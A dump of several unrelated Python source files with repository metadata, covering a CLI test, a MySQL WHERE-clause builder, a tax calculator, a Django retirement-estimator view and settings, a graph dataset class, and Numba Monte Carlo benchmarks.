        self.assertRaises(SystemExit, main)
        self.assertRegex(self.capturedOuput.getvalue(), r"^usage: fzfaws \[-h\].*")

    def test_copy_config(self):
        """copy_config() places fzfaws.yml under $XDG_CONFIG_HOME/fzfaws."""
        with tempfile.TemporaryDirectory() as tmpdirname:
            os.environ["XDG_CONFIG_HOME"] = tmpdirname
            copy_config()
            if not Path("%s/fzfaws/fzfaws.yml" % tmpdirname).is_file():
                self.fail("config file not properly copied")

    @patch("fzfaws.cli.get_default_args")
    def test_exceptions(self, mocked_args):
        """main() converts known exception types into a clean SystemExit."""
        mocked_args.side_effect = InvalidFileType
        sys.argv = [__file__, "s3"]
        self.assertRaises(SystemExit, main)
        self.assertEqual(
            self.capturedOuput.getvalue(), "Selected file is not a valid file type\n"
        )
        mocked_args.side_effect = SystemExit
        sys.argv = [__file__, "s3"]
        self.assertRaises(SystemExit, main)
        mocked_args.side_effect = KeyboardInterrupt
        sys.argv = [__file__, "s3"]
        self.assertRaises(SystemExit, main)
        # NOTE(review): mock raises the class by instantiating it with no
        # arguments, but botocore's ClientError requires (error_response,
        # operation_name) -- confirm this branch exercises what it intends.
        mocked_args.side_effect = ClientError
        sys.argv = [__file__, "s3"]
        self.assertRaises(SystemExit, main)
| [
"kevin7441@gmail.com"
] | kevin7441@gmail.com |
b12564d2f5104f58ae800d80cb88bb520d543101 | 6d66e5f112f48db059002f9d2bdd0a81e552ad8c | /orb/core/connection_types/sql/mysql/statements/where.py | cb76e1c1639c88bc1e81d751d8667f5a2bd9755d | [
"MIT"
] | permissive | charblanc/orb | 9fd94bb2fbc172e4c3c6a464d83b5c30b11957dd | 1db49eb7eaee4b4fb8ff1024d6652e84a14c67f9 | refs/heads/master | 2021-01-12T22:22:26.932895 | 2016-08-23T02:33:46 | 2016-08-23T02:33:46 | 66,504,604 | 0 | 0 | null | 2016-08-24T22:33:42 | 2016-08-24T22:33:41 | null | UTF-8 | Python | false | false | 7,392 | py | import os
from projex.lazymodule import lazy_import
from ..mysqlconnection import MySQLStatement
# Import orb lazily to avoid a circular import at module load time.
orb = lazy_import('orb')
class WHERE(MySQLStatement):
    """Builds the WHERE clause (SQL text + bind data) for a MySQL query.

    Calling an instance with a model and an orb Query/QueryCompound returns a
    ``(sql, data)`` pair where ``data`` maps randomly-suffixed placeholder
    keys to their bound values.
    """

    def __call__(self, model, query, aliases=None, fields=None):
        """Render *query* against *model*; returns (sql_text, bind_data)."""
        if query is None:
            return u'', {}
        aliases = aliases or {}
        fields = fields or {}
        data = {}
        query = query.expand(model)
        # generate a query compound
        if isinstance(query, orb.QueryCompound):
            # Recursively render each sub-query and join with AND/OR.
            sub_query_sql = []
            for sub_query in query:
                sub_sql, sub_data = self(model, sub_query, aliases, fields)
                if sub_sql:
                    sub_query_sql.append(sub_sql)
                    data.update(sub_data)
            joiner = u' AND ' if query.op() == query.Op.And else u' OR '
            sql = u'({0})'.format(joiner.join(sub_query_sql))
        else:
            column = query.column(model)
            if not column:
                raise orb.errors.ColumnNotFound(model.schema().name(), query.columnName())
            # generate the sql field
            field = fields.get(column) or self.generateField(model, column, query, aliases)
            # Random suffix keeps bind keys unique when a column appears more
            # than once in the same statement.
            # NOTE(review): str.encode('hex') is Python 2 only -- this module
            # appears to target Python 2.
            value_key = u'{0}_{1}'.format(column.field(), os.urandom(4).encode('hex'))
            # calculate any math operations to the sql field
            for op, target in query.math():
                field = column.dbMath(field, op, target)
            # get the additional information
            value = query.value()
            op = query.op()
            case_sensitive = query.caseSensitive()
            invert = query.isInverted()
            try:
                sql_op = self.opSql(op, case_sensitive)
            except KeyError:
                raise orb.errors.QueryInvalid('{0} is an unknown operator'.format(orb.Query.Op(op)))
            def convert_value(val):
                # Collapse model instances to their id and recurse into
                # containers so values are plain bindable types.
                if isinstance(val, orb.Model):
                    return val.get(val.schema().idColumn(), inflated=False)
                elif isinstance(val, (tuple, list, set)):
                    return tuple(convert_value(v) for v in val)
                else:
                    return val
            value = convert_value(value)
            # convert data from a query
            if isinstance(value, (orb.Query, orb.QueryCompound)):
                # Column-to-column comparison: render the other side's field.
                val_model = value.model()
                val_column = value.column()
                val_field = self.generateField(val_model, val_column, value, aliases)
                if invert:
                    sql = u' '.join((val_field, sql_op, field))
                else:
                    sql = u' '.join((field, sql_op, val_field))
            # convert a null value
            elif value is None:
                if op == orb.Query.Op.Is:
                    sql = u'{0} IS NULL'.format(field)
                elif op == orb.Query.Op.IsNot:
                    sql = u'{0} IS NOT NULL'.format(field)
                else:
                    # NOTE(review): orb.QueryInvalid is used here but
                    # orb.errors.QueryInvalid elsewhere in this class --
                    # confirm the short alias exists on the orb module.
                    raise orb.QueryInvalid('Invalid operation for NULL: {0}'.format(orb.Query.Op(op)))
            # convert a collection value
            elif isinstance(value, orb.Collection):
                # Render the collection as an IN (SELECT ...) sub-query.
                SELECT = self.byName('SELECT')
                sub_sql, sub_data = SELECT(value.model(), value.context(), fields=fields)
                if sub_sql:
                    sql = u'{0} {1} ({2})'.format(field, sql_op, sub_sql.strip(';'))
                    data.update(sub_data)
                else:
                    # NOTE(review): same orb.QueryInvalid alias question as above.
                    raise orb.QueryInvalid('Could not create sub-query')
            # convert all other data
            else:
                if op in (orb.Query.Op.IsIn, orb.Query.Op.IsNotIn) and not value:
                    # An empty IN () clause can never match; signal it upward.
                    raise orb.errors.QueryIsNull()
                elif op in (orb.Query.Op.Contains, orb.Query.Op.DoesNotContain):
                    value = u'%{0}%'.format(value)
                elif op in (orb.Query.Op.Startswith, orb.Query.Op.DoesNotStartwith):
                    value = u'%{0}'.format(value)
                elif op in (orb.Query.Op.Endswith, orb.Query.Op.DoesNotEndwith):
                    value = u'{0}%'.format(value)
                if invert:
                    opts = (u'%({0})s'.format(value_key), sql_op, field)
                else:
                    opts = (field, sql_op, u'%({0})s'.format(value_key))
                sql = u' '.join(opts)
                data[value_key] = value
            # Translated (i18n) columns live in a side table: wrap the
            # rendered condition in an IN (SELECT ...) against it.
            if column.testFlag(column.Flags.I18n) and column not in fields:
                model_name = aliases.get(model) or model.schema().dbname()
                i18n_sql = u'`{name}`.`{field}` IN (' \
                           u' SELECT `{name}_id`' \
                           u' FROM `{namespace}`.`{name}_i18n`' \
                           u' WHERE {sub_sql}' \
                           u')'
                default_namespace = orb.Context().db.name()
                sub_sql = sql.replace('`{0}`'.format(model_name), '`{0}_i18n`'.format(model_name))
                sql = i18n_sql.format(name=model_name,
                                      namespace=model.schema().namespace() or default_namespace,
                                      sub_sql=sub_sql,
                                      field=model.schema().idColumn().field())
        return sql, data

    def generateField(self, model, column, query, aliases):
        """Return the backtick-quoted `alias`.`column` SQL for *column*,
        wrapped in any SQL functions attached to the query."""
        alias = aliases.get(model) or model.schema().dbname()
        field = column.field()
        sql_field = '`{0}`.`{1}`'.format(alias, field)
        # process any functions on the query
        for func in query.functions():
            try:
                sql_func = self.funcSql(func)
                sql_field = sql_func.format(sql_field)
            except KeyError:
                msg = 'Unknown function type: {0}'.format(orb.Query.Function(func))
                raise orb.errors.QueryInvalid(msg)
        return sql_field

    @staticmethod
    def opSql(op, caseSensitive=False):
        """Map an orb query operator to its MySQL operator text.

        Raises KeyError for unknown operators (translated by the caller).
        """
        general_mapping = {
            orb.Query.Op.Is: u'=',
            orb.Query.Op.IsNot: u'!=',
            orb.Query.Op.LessThan: u'<',
            orb.Query.Op.Before: u'<',
            orb.Query.Op.LessThanOrEqual: u'<=',
            orb.Query.Op.GreaterThanOrEqual: u'>=',
            orb.Query.Op.GreaterThan: u'>',
            orb.Query.Op.After: u'>',
            orb.Query.Op.IsIn: u'IN',
            orb.Query.Op.IsNotIn: u'NOT IN'
        }
        sensitive_mapping = {
            orb.Query.Op.Matches: u'~',
            orb.Query.Op.DoesNotMatch: u'!~',
            orb.Query.Op.Contains: u'LIKE',
            orb.Query.Op.DoesNotContain: u'NOT LIKE'
        }
        non_sensitive_mapping = {
            orb.Query.Op.Matches: u'~*',
            orb.Query.Op.DoesNotMatch: u'!~*',
            orb.Query.Op.Contains: u'LIKE',
            orb.Query.Op.DoesNotContain: u'NOT LIKE'
        }
        return general_mapping.get(op) or (sensitive_mapping[op] if caseSensitive else non_sensitive_mapping[op])

    @staticmethod
    def funcSql(func):
        """Map an orb query function to its MySQL SQL template."""
        func_mapping = {
            orb.Query.Function.Lower: u'lcase({0})',
            orb.Query.Function.Upper: u'ucase({0})',
            orb.Query.Function.Abs: u'abs({0})',
            orb.Query.Function.AsString: u'cast({0} as varchar)'
        }
        return func_mapping[func]
# Register this statement so the MySQL backend can look it up by name when
# assembling queries.
MySQLStatement.registerAddon('WHERE', WHERE())
| [
"ehulser@teslamotors.com"
] | ehulser@teslamotors.com |
0755c19bf2fd59870c1cef2bc3c27174d800d966 | a946b8ef844ded0e6ad361c7a5fb5b5987f071ab | /Tax.py | 68dec46a23058d3e9e08a6f9ac48ec7c71912620 | [] | no_license | Greenteadrinker/Tutorial9_Tax | 79dcb4c88c0ececcf5ca179be27db89654aec1fb | ad14abfd7c18c9766ce5315078f01b6daf397736 | refs/heads/master | 2021-01-24T17:31:53.651206 | 2018-03-19T14:59:59 | 2018-03-19T14:59:59 | 123,231,515 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,478 | py | income1 = float(input("Enter the Husband income: "))
# Second spouse's annual income in HKD, used by the comparison below.
income2 = float(input("Enter the Wife income: "))
def singleTaxCal(income1, income2):
    """Hong Kong salaries tax for a couple assessed separately.

    Each spouse deducts MPF contributions (5% of income, capped at 15,000)
    and the basic allowance (132,000). Net chargeable income is taxed
    progressively at 2%/7%/12%/17% over successive 45,000 bands, then a 75%
    rebate capped at 20,000 is applied per person.

    Bug fixed: the original bracket tests (``45001 <= x <= 90000`` etc.)
    left gaps such as (45000, 45001) where non-integer chargeable income --
    inevitable once the 5% MPF deduction is taken -- matched no branch and
    crashed with UnboundLocalError. The brackets are now continuous.

    Returns the combined tax payable of both spouses (HKD).
    """
    BasicAllowance = 132000

    def _tax_for(income):
        # Mandatory Provident Fund deduction: 5% of income, capped at 15,000.
        mpf = min(income * 0.05, 15000)
        chargeable = income - mpf - BasicAllowance
        if chargeable <= 0:
            return 0
        # Progressive 45,000-wide bands; cumulative tax of the filled lower
        # bands is 900 / 3150 / 5400 (2%, 7%, 12% of 45,000 respectively).
        if chargeable <= 45000:
            gross = chargeable * 0.02
        elif chargeable <= 90000:
            gross = 900 + (chargeable - 45000) * 0.07
        elif chargeable <= 135000:
            gross = 900 + 3150 + (chargeable - 90000) * 0.12
        else:
            gross = 900 + 3150 + 5400 + (chargeable - 135000) * 0.17
        # 75% tax rebate, capped at 20,000.
        return gross - min(gross * 0.75, 20000)

    return _tax_for(income1) + _tax_for(income2)
def marriedCouple(income1, income2):
    """Hong Kong salaries tax under joint (married) assessment.

    Combined income less each spouse's MPF (5%, capped at 15,000) is set
    against the joint allowance of 264,000; the excess is taxed at
    2%/7%/12%/17% over successive 45,000 bands, then a 75% rebate capped at
    20,000 is applied.

    Bug fixed: the original tested ``chargeableincome in range(264001, 309000)``
    etc. -- always False for the float incomes this program works with (and
    for boundary integers like 309000), so the function silently returned
    None and the later comparison in main() failed. The brackets are now
    continuous numeric comparisons.

    Returns the joint tax payable (HKD), 0 when below the allowance.
    """
    mpf1 = min(income1 * 0.05, 15000)
    mpf2 = min(income2 * 0.05, 15000)
    chargeableincome = (income1 - mpf1) + (income2 - mpf2)
    # Net chargeable income after the married person's allowance.
    net = chargeableincome - 264000
    if net <= 0:
        return 0
    # Progressive 45,000-wide bands; cumulative tax of the filled lower
    # bands is 900 / 3150 / 5400 (2%, 7%, 12% of 45,000 respectively).
    if net <= 45000:
        income_tax = net * 0.02
    elif net <= 90000:
        income_tax = 900 + (net - 45000) * 0.07
    elif net <= 135000:
        income_tax = 900 + 3150 + (net - 90000) * 0.12
    else:
        income_tax = 900 + 3150 + 5400 + (net - 135000) * 0.17
    # 75% tax rebate, capped at 20,000.
    return income_tax - min(income_tax * 0.75, 20000)
#call main function
def main(income1,income2):
    """Print both assessments and return the recommendation string.

    IMPROVEMENT: the original recomputed singleTaxCal/marriedCouple up to
    three times each; each is now evaluated once.  Printed text and the
    returned strings are unchanged for compatibility with callers/tests.
    """
    single = singleTaxCal(income1, income2)
    married = marriedCouple(income1, income2)
    print("Single tax = ", format(single, "7.2f"))
    print("Couple tax = ", format(married, "7.2f"))
    if single > married:
        print("Choose Married Tax")
        return "Choose Married Tax"
    elif single < married:
        print("Choose single tax")
        return "Choose single tax"
    else:
        print("There are no different")
        return "There are no different"
#main function
# Script entry point: income1/income2 are defined earlier in the file
# (outside this excerpt) — presumably read from user input; verify upstream.
main(income1,income2)
| [
"noreply@github.com"
] | noreply@github.com |
536610ba716a9b8715ef45dffd40ac555213c201 | 1dcea2a511f14a43701994f6a7785afd21a20d74 | /Algorithm/61_RotateList.py | ad33302d777bb10f3daee4eb21b7a5bd9a4a46c7 | [] | no_license | lingtianwan/Leetcode2 | 66031e256a2928c6197516f83f14748c52e91b8c | 80a604cc09d5d2d62dd05157d8b829de675e4404 | refs/heads/master | 2021-01-13T11:17:18.238465 | 2017-02-09T01:43:38 | 2017-02-09T01:43:38 | 81,395,927 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 956 | py | # Given a list, rotate the list to the right by k places, where k is non-negative.
#
# For example:
# Given 1->2->3->4->5->NULL and k = 2,
# return 4->5->1->2->3->NULL.
# Definition for singly-linked list.
# class ListNode(object):
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution(object):
    def rotateRight(self, head, k):
        """
        :type head: ListNode
        :type k: int
        :rtype: ListNode
        """
        # Nothing to rotate in an empty list.
        if not head:
            return None
        # First pass: measure the list length.
        length = 0
        node = head
        while node:
            node = node.next
            length += 1
        # Rotating by a multiple of the length leaves the list untouched.
        k %= length
        if k == 0:
            return head
        # Advance a lead pointer k nodes ahead, then move lead and trail
        # together until lead reaches the tail; trail then sits just before
        # the new head.
        lead = head
        for _ in range(k):
            lead = lead.next
        trail = head
        while lead.next:
            lead = lead.next
            trail = trail.next
        new_head = trail.next
        trail.next = None
        lead.next = head
        return new_head
| [
"lingtian.wan@gmail.com"
] | lingtian.wan@gmail.com |
8c5369e862b8187fd0b71dc8f0f2dfa62994244e | f9994f66f21f8bbdfd6502b04fd76534a3a3fa62 | /firstpython.py | c663eda1ce15b330c06a4c9f87190d9a5de781a3 | [] | no_license | rishika910/silver-journey | 4681643555e5a5867b58e27ea63426de9c28a8dd | 6125396016a799fac0d0de855f46531e32702fba | refs/heads/main | 2023-07-10T19:12:05.125535 | 2021-08-21T17:36:30 | 2021-08-21T17:36:30 | 398,619,695 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 37 | py | # Display output
print("A new file")
| [
"noreply@github.com"
] | noreply@github.com |
1f68ff02a3784d7f3d9469d7701cb42603a1e5dc | a5b3a2e2dc7066ed2ae035bdfb595f1971c550aa | /上课练习2/day8-socket-server/多线程/线程锁—互斥锁Mutex.py | 8551c8a31df7943c2dba9ddfecdd4bc2e12d1549 | [] | no_license | jiaziming/oldboy | bed26a0ea22c80600bbcae61da82055577b2a61a | 746b24a500809a8bce71922a496532ec69de93e5 | refs/heads/master | 2021-01-23T01:33:53.946410 | 2017-07-28T03:27:05 | 2017-07-28T03:27:05 | 86,789,623 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 546 | py | #!/usr/bin/env python
#-*-conding:utf-8-*-
import threading,time
def addNUM():
    """Worker body: read the shared counter, sleep, then decrement it once.

    Relies on the module-level globals `num` (shared counter) and `lock`
    (mutex guarding the read-modify-write below).
    """
    global num # fetch this global variable in every thread
    print('--get num:',num)   # unsynchronized read, for demonstration only
    time.sleep(1)
    lock.acquire()            # serialize the decrement across all workers
    num -= 1 # decrement the shared variable by 1
    lock.release()
lock = threading.Lock()
num = 100  # shared counter; each of the 100 workers decrements it once
thread_list = []
for i in range(100):
    t = threading.Thread(target=addNUM)
    t.start()
    thread_list.append(t)
# BUG FIX: the original looped `for i in thread_list: t.join()`, which joined
# only the last-created thread (bound to `t`) 100 times, so `num` could be
# printed before the other workers finished.  Join every thread instead.
for t in thread_list:  # wait for all worker threads to finish
    t.join()
print('final num:',num)
"jiaziming123@sina.cn"
] | jiaziming123@sina.cn |
0ea731807079336c5edf2453e90cb32ecfc823f9 | 135238dfa1bdd3a577c6b08ebcd478a649c0dce3 | /cfgov/retirement_api/views.py | c3c345a078d858dd6b4b6b3fae311728ad76cb07 | [
"CC0-1.0"
] | permissive | adebisi-aden/consumerfinance.gov | 5e716a03180ba18bac747e5f3e7e47c7774c2dab | 8c0f5afac341823c59f73b0c6bd60592e0f5eaca | refs/heads/main | 2023-08-12T04:13:43.687689 | 2021-09-17T14:24:54 | 2021-09-17T14:24:54 | 407,607,316 | 0 | 0 | CC0-1.0 | 2021-09-17T16:21:12 | 2021-09-17T16:21:11 | null | UTF-8 | Python | false | false | 2,445 | py | import json
import os
from django.http import HttpResponse, HttpResponseBadRequest
from dateutil import parser
from .utils.ss_calculator import get_retire_data
from .utils.ss_utilities import get_retirement_age
BASEDIR = os.path.dirname(__file__)
def param_check(request, param):
    """Return the GET parameter *param* when present and non-empty, else None."""
    value = request.GET.get(param)
    return value if value else None
def income_check(param):
    """Strip '$', ',' and any decimal part from *param* and return it as int.

    Returns None when the cleaned string is not a valid integer.
    """
    digits = param.replace("$", "").replace(",", "").partition(".")[0]
    try:
        return int(digits)
    except ValueError:
        return None
def estimator(request, dob=None, income=None, language="en"):
    """Return SSA retirement-benefit estimates as a JSON HttpResponse.

    *dob* and *income* may arrive either as positional arguments or as GET
    parameters on *request*; both are validated, folded into the SSA query
    parameters, and passed to get_retire_data().  Returns
    HttpResponseBadRequest on an unparsable date of birth or income.

    IMPROVEMENT: the original duplicated the income-cleaning logic across the
    argument and GET-parameter paths; both now reduce to one obtain-then-clean
    sequence with identical error responses.
    """
    ssa_params = {
        "dobmon": 0,
        "dobday": 0,
        "yob": 0,
        "earnings": 0,
        "lastYearEarn": "",  # not using
        "lastEarn": "",  # not using
        "retiremonth": "",  # only using for past-FRA users
        "retireyear": "",  # only using for past-FRA users
        "dollars": 1,  # benefits to be calculated in current-year dollars
        "prgf": 2,
    }
    if dob is None:
        dob = param_check(request, "dob")
        if not dob:
            return HttpResponseBadRequest("invalid date of birth")
    if income is None:
        income = param_check(request, "income")
        if not income:
            return HttpResponseBadRequest("invalid income")
    income = income_check(income)
    if income is None:
        return HttpResponseBadRequest("invalid income")
    try:
        dob_parsed = parser.parse(dob)
    except ValueError:
        return HttpResponseBadRequest("invalid date of birth")
    DOB = dob_parsed.date()
    ssa_params["dobmon"] = DOB.month
    ssa_params["dobday"] = DOB.day
    ssa_params["yob"] = DOB.year
    ssa_params["earnings"] = income
    data = get_retire_data(ssa_params, language)
    return HttpResponse(json.dumps(data), content_type="application/json")
def get_full_retirement_age(request, birth_year):
    """Return the full retirement age for *birth_year* as JSON, or a 400."""
    age = get_retirement_age(birth_year)
    if not age:
        return HttpResponseBadRequest("bad birth year (%s)" % birth_year)
    payload = json.dumps(age)
    return HttpResponse(payload, content_type="application/json")
| [
"noreply@github.com"
] | noreply@github.com |
cc6b83a6ac136bf167c42cf0929469a23be292e0 | 57af0aa503918f5586696271856ddf10685a106a | /code/inductive/dataset.py | 4a9c4446b6ac4a4715d7b9d90c12fb2d5d1b8495 | [] | no_license | Linkerbrain/GNN-document-classification | 2a5e7dd527dc1f0694e1e12cd125f2144f4aa1f2 | 7e19408f75510685fc4fa13507532d161460ec7e | refs/heads/main | 2023-04-23T09:20:26.741356 | 2021-05-04T11:33:10 | 2021-05-04T11:33:10 | 357,503,385 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,632 | py | import torch
import random
import numpy as np
from torch_geometric.data import Data
from torch_geometric.data import DataLoader
from tqdm import tqdm
class InductiveDataset():
    """Wraps raw document graphs as PyTorch Geometric `Data` objects.

    Words and labels are mapped to indices through the supplied vocabularies;
    out-of-vocabulary words fall back to the ``___UNK___`` token and unknown
    labels to index 0.  Embedding-failure counters are tracked for the debug
    summary printed at the end of construction.
    """
    def __init__(self, graphs, labels, word_vocab, label_vocab):
        # vocabs for later
        self.word_vocab = word_vocab
        self.label_vocab = label_vocab
        # debug stats
        self.word_total = 0
        self.word_fails = 0
        self.label_total = 0
        self.label_fails = 0
        # The Data
        self.graphs = self.create_dataobjects(graphs, labels)
        # facts
        self.vocab_size = len(self.word_vocab)
        self.label_count = len(self.label_vocab)
        # print debug stats
        tag = "[dataprep] "
        succes = "Succesfully embedded %d/%d words, %d/%d labels." % (self.word_total-self.word_fails, self.word_total, self.label_total-self.label_fails, self.label_total)
        total_graphs = len(self.graphs)
        ave_length = sum([graph.num_nodes for graph in self.graphs]) / total_graphs
        max_length = max([graph.num_nodes for graph in self.graphs])
        summary = "Dataset contains %d graphs, averaging %d nodes, with a maximum of %d" % (total_graphs, ave_length, max_length)
        print("[dataprep]" + succes + "\n" + tag + summary)
    def get_nodes_idx(self, nodes):
        """returns the corresponding indexes of words, requires ___UNK___ token in vocab"""
        idxs = []
        for node in nodes:
            self.word_total += 1
            if node in self.word_vocab:
                idxs.append(self.word_vocab[node])
            else:
                # out-of-vocabulary word: count the miss, map to ___UNK___
                self.word_fails += 1
                idxs.append(self.word_vocab["___UNK___"])
        return torch.tensor(idxs, dtype=torch.long)
    def get_label_idx(self, label):
        """returns the corresponding index of label, unknown labels get added to first label"""
        self.label_total += 1
        if label in self.label_vocab:
            return torch.tensor([self.label_vocab[label]], dtype=torch.long)
        else:
            # unknown label: count the miss and fall back to index 0
            self.label_fails += 1
            return torch.tensor([0], dtype=torch.long)
    def create_dataobjects(self, graphs, labels):
        """
        Create PyTorch Geometric Data objects from the raw graphs.

        Each raw graph is ((edge_indices, edge_weights), nodes); the result
        carries word indices as x, the edge list/weights, and the label as y.
        """
        processed_graphs = []
        print("[dataprep] Making Data objects")
        for graph, label in zip(graphs, labels):
            ((edge_indices, edge_weights), nodes) = graph
            nodes_idx = self.get_nodes_idx(nodes)
            label_idx = self.get_label_idx(label)
            torch_edges = torch.tensor(edge_indices, dtype=torch.long)
            torch_edge_weights = torch.tensor(edge_weights, dtype=torch.float)
            graph = Data(x=nodes_idx, edge_index=torch_edges, edge_attr=torch_edge_weights, y=label_idx)
            graph.num_nodes = len(nodes_idx)
            processed_graphs.append(graph)
        return processed_graphs
    def to_dataloader(self, batch_size, shuffle=True, test_size=None):
        """
        Makes a PyTorch Geometric Dataloader that can be used to retrieve batches.

        With test_size set, shuffles self.graphs in place and returns a
        (train_loader, test_loader) pair split at 1 - test_size.
        """
        # make a train and test dataloader if test_size is provided
        if test_size:
            random.shuffle(self.graphs)
            split_n = int(len(self.graphs) * (1-test_size))
            return DataLoader(self.graphs[:split_n], batch_size, shuffle), DataLoader(self.graphs[split_n:], batch_size, shuffle)
        return DataLoader(self.graphs, batch_size, shuffle)
    def __getitem__(self, index):
        return self.graphs[index]
    def __len__(self):
        return len(self.graphs)
"lloerakker@gmail.com"
] | lloerakker@gmail.com |
01f689e9ef9e799a2321e60a33ab66011923ddfa | 06f5ed6cec8ae105eb4f47ce87edae7080e1f8a8 | /chirper/settings.py | 532bb3cfa617d0224e85c3e930678260ed80d9a4 | [] | no_license | terenced/chirper | 6a8a9e0923e73e161e7870df08dda08ada2d90b9 | 041036427ca990ccf3f718d37fb6cf27f7f335b2 | refs/heads/master | 2020-04-06T05:24:06.225035 | 2013-10-22T20:44:56 | 2013-10-22T20:44:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,836 | py | # Django settings for chirper project.
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
# ('Your Name', 'your_email@example.com'),
)
AUTH_PROFILE_MODULE = "chirper_api.UserProfile"
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'chirper.db', # Or path to database file if using sqlite3.
# The following settings are not used with sqlite3:
'USER': '',
'PASSWORD': '',
'HOST': '', # Empty for localhost through domain sockets or '127.0.0.1' for localhost through TCP.
'PORT': '', # Set to empty string for default.
}
}
# Hosts/domain names that are valid for this site; required if DEBUG is False
# See https://docs.djangoproject.com/en/1.5/ref/settings/#allowed-hosts
ALLOWED_HOSTS = []
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
TIME_ZONE = 'America/Chicago'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale.
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/var/www/example.com/media/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://example.com/media/", "http://media.example.com/"
MEDIA_URL = ''
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/var/www/example.com/static/"
STATIC_ROOT = ''
# URL prefix for static files.
# Example: "http://example.com/static/", "http://static.example.com/"
STATIC_URL = '/static/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'zzi40y8^oqp3+xb%db=4vrapzru%rs2^m7-ny-z=#!^506dv(^'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
# Uncomment the next line for simple clickjacking protection:
# 'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'chirper.urls'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'chirper.wsgi.application'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'django_extensions',
'rest_framework',
'rest_framework.authtoken',
'chirper_api',
'chirper_web'
# Uncomment the next line to enable the admin:
# 'django.contrib.admin',
# Uncomment the next line to enable admin documentation:
# 'django.contrib.admindocs',
)
SESSION_SERIALIZER = 'django.contrib.sessions.serializers.JSONSerializer'
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
REST_FRAMEWORK = {
'DEFAULT_AUTHENTICATION_CLASSES': (
'rest_framework.authentication.TokenAuthentication',
),
'DEFAULT_PERMISSION_CLASSES': (
'rest_framework.permissions.IsAuthenticated',
)
} | [
"terry.dellino@gmail.com"
] | terry.dellino@gmail.com |
b01bf0b6ca13eb712951accf540807cec349afc4 | c18a363f25565fe61221dba7987d461d698bc3bb | /testNumba/test_officalWeb_2.py | ac0a0cc70b6493bc463bf5c091914afdab4ae875 | [] | no_license | ijiangpeiyong/ijiang | a1e689707bfcefc29170ae8c85067a76c18a0829 | 66a4da5d38d954a400fe7bf9def796f2bf6bdb6e | refs/heads/master | 2020-04-10T16:05:32.341278 | 2019-01-03T10:45:58 | 2019-01-03T10:45:58 | 161,132,860 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,183 | py | from numba import jit
import random
import time
def monte_carlo_pi(nsamples):
    """Estimate pi by sampling nsamples points uniformly in the unit square."""
    hits = 0
    for _ in range(nsamples):
        px = random.random()
        py = random.random()
        # Count points falling inside the quarter unit circle.
        if px ** 2 + py ** 2 < 1.0:
            hits += 1
    return 4.0 * hits / nsamples
@jit()
def jit_monte_carlo_pi(nsamples):
    """Monte-Carlo pi estimate compiled lazily by Numba (object mode allowed)."""
    acc=0
    for i in range(nsamples):
        x=random.random()
        y=random.random()
        if (x**2+y**2)<1.0:
            acc+=1
    return 4.0*acc/nsamples
@jit(nopython=True)
def nopython_monte_carlo_pi(nsamples):
    """Monte-Carlo pi estimate compiled in Numba nopython mode (no object fallback)."""
    acc=0
    for i in range(nsamples):
        x=random.random()
        y=random.random()
        if (x**2+y**2)<1.0:
            acc+=1
    return 4.0*acc/nsamples
